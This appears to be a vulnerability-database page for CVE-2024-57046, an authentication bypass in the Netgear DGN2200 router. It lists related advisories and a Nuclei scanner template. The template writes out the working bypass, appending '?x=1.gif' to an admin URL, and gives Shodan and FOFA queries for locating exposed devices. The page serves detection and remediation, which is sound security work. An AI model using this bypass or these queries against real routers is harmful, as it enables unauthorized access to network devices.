| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| The vulnerability of NETGEAR DGND2200 router microprogramming software, related to deficiencies in authentication procedures, allows attackers to circumvent existing security restrictions. | 1 Mar 202500:00 | – | bdu_fstec | |
| CVE-2024-57046 | 18 Feb 202515:17 | – | circl | |
| NETGEAR DGN2200 安全漏洞 | 18 Feb 202500:00 | – | cnnvd | |
| NETGEAR DGN2200 Privilege Issue Vulnerability | 7 Mar 202500:00 | – | cnvd | |
| CVE-2024-57046 | 18 Feb 202500:00 | – | cve | |
| CVE-2024-57046 | 18 Feb 202500:00 | – | cvelist | |
| CVE-2024-57046 | 18 Feb 202515:15 | – | nvd | |
| CVE-2024-57046 | 18 Feb 202515:15 | – | osv | |
| CVE-2024-57046 | 20 Feb 202500:24 | – | redhatcve | |
| ThreatsDay Bulletin: $290M DeFi Hack, macOS LotL Abuse, ProxySmart SIM Farms +25 New Stories | 23 Apr 202613:17 | – | thn |
id: CVE-2024-57046
info:
name: Netgear DGN2200 - Improper Authentication
author: ritikchaddha
severity: high
description: |
A vulnerability in the Netgear DGN2200 router with firmware version v1.0.0.46 and earlier permits unauthorized individuals to bypass the authentication. When adding "?x=1.gif" to the requested url, it will be recognized as passing the authentication.
impact: |
Attackers on the local network can bypass authentication by appending '?x=1.gif' to URLs, gaining unauthorized access to administrative functions and router configuration.
remediation: |
Update Netgear DGN2200 router to firmware version later than v1.0.0.46 that addresses the authentication bypass vulnerability.
reference:
- https://github.com/Shuanunio/CVE_Requests/blob/main/Netgear/DGN2200/ACL%20bypass%20Vulnerability%20in%20Netgear%20DGN2200.md
- https://www.netgear.com/about/security/
- https://nvd.nist.gov/vuln/detail/CVE-2024-57046
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2024-57046
cwe-id: CWE-287
epss-score: 0.0206
epss-percentile: 0.7904
metadata:
verified: true
max-request: 2
vendor: Netgear
product: DGN2200
shodan-query: http.title:"DGN2200"
fofa-query: title="NETGEAR DGN2200"
tags: cve,cve2024,netgear,router,auth-bypass,dgn2200,vuln,vkev
http:
- raw:
- |
GET /RST_status.htm HTTP/1.1
Host: {{Hostname}}
- |
GET /RST_status.htm?x=1.gif HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body_2, "<title>Router Status", "Show Statistics")'
- 'status_code_1 == 401 && status_code_2 == 200'
condition: and
# digest: 490a0046304402205ebe2002da7b6eeb80a8e6f151c278f1faa7fcf4d744de59e55048147e241f5a022076729c8d2ba52a54f1612467bba9942eb24b935908046f3dac3c265f72e0ca79:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation